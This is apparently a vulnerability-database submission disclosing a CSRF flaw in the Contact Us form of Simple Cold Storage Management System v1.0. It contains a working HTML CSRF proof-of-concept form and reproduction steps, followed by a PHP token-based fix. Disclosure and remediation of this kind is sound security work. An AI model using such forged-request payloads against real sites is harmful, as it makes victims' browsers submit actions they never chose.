Submission #49111: Simple Cold Storage Management System - CSRF in Contact Us form
Information

Title: Simple Cold Storage Management System - CSRF in Contact Us form
Description:
# Exploit Title: Simple Cold Storage Management System v1.0 - CSRF in "Contact Us"
# Exploit Author: Sourav Kumar
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.html
# Software Link: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.html
# Version: v1.0
# Tested on: Windows 11, Apache

Description: Cross-site request forgery (CSRF) is an attack that forces authenticated users to submit a request to a web application against which they are currently authenticated. CSRF attacks exploit the trust a web application has in an authenticated user.

Vulnerable Parameters: Contact Us

Payload:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/csms/classes/Master.php?f=save_message" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="id" value="" />
      <input type="hidden" name="fullname" value="as" />
      <input type="hidden" name="contact" value="885665" />
      <input type="hidden" name="email" value="kittukumar267&#64;gmail&#46;com" />
      <input type="hidden" name="message" value="seht" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Steps:
1) Go to the Contact Us page - http://localhost/csms/?page=contact_us
2) Fill in the form
3) Intercept the POST request with Burp Suite
4) Generate the CSRF PoC payload
5) Open the HTML payload in a browser
6) You will receive this message: {"status":"success","msg":"Your message has successfully sent."}
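The root cause is that save_message accepts any POST that carries the victim's session cookie. As an added illustration of the fix (not code from the project or the submitter), the handler behind Master.php?f=save_message could require a per-session synchronizer token; the function names, session layout and JSON responses below are assumptions made for this example:

```php
<?php
// Added example, not the project's code: synchronizer-token CSRF defence for a
// contact-form handler such as Master.php?f=save_message. The function names,
// session layout and JSON responses are assumptions made for this illustration.

// Defence in depth: a Lax SameSite session cookie is not attached to cross-site
// POSTs like the PoC's form, so the request is unauthenticated before the token
// is even checked (session_set_cookie_params array form needs PHP >= 7.3).
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

function csrf_token(): string {
    // One unguessable token per session, created on first use.
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_field(): string {
    // Hidden input to render inside the Contact Us form (page=contact_us).
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

function csrf_check(): bool {
    $sent = $_POST['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    // hash_equals compares in constant time. An attacker's page cannot read the
    // victim's token, so a forged submission arrives without a matching value.
    return $expected !== '' && is_string($sent) && hash_equals($expected, $sent);
}

function save_message(): void {
    header('Content-Type: application/json');
    if ($_SERVER['REQUEST_METHOD'] !== 'POST' || !csrf_check()) {
        http_response_code(403);
        echo json_encode(['status' => 'failed', 'msg' => 'Invalid or missing CSRF token.']);
        return;
    }
    // Only a token-bearing request reaches this point; validate the fullname,
    // contact, email and message fields and store them as the app did before.
    echo json_encode(['status' => 'success', 'msg' => 'Your message has successfully sent.']);
}
```

With csrf_field() rendered inside the form and csrf_check() run first in the handler, the Burp-generated payload above carries no token and is answered with a 403 instead of the success message seen in step 6.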
Source: https://github.com/souravkr529/CSRF-in-Cold-Storage-Management-System/blob/main/PoC
User: Sourav529 (UID 33985)
Submitted: 18/10/2022 11:14 (4 years ago)
Moderated: 18/10/2022 11:42 (28 minutes later)
Status: accepted
VulDB Entry: 211194 [SourceCodester Simple Cold Storage Management System 1.0 Contact Us /csms/?page=contact_us cross-site request forgery]
Points: 20
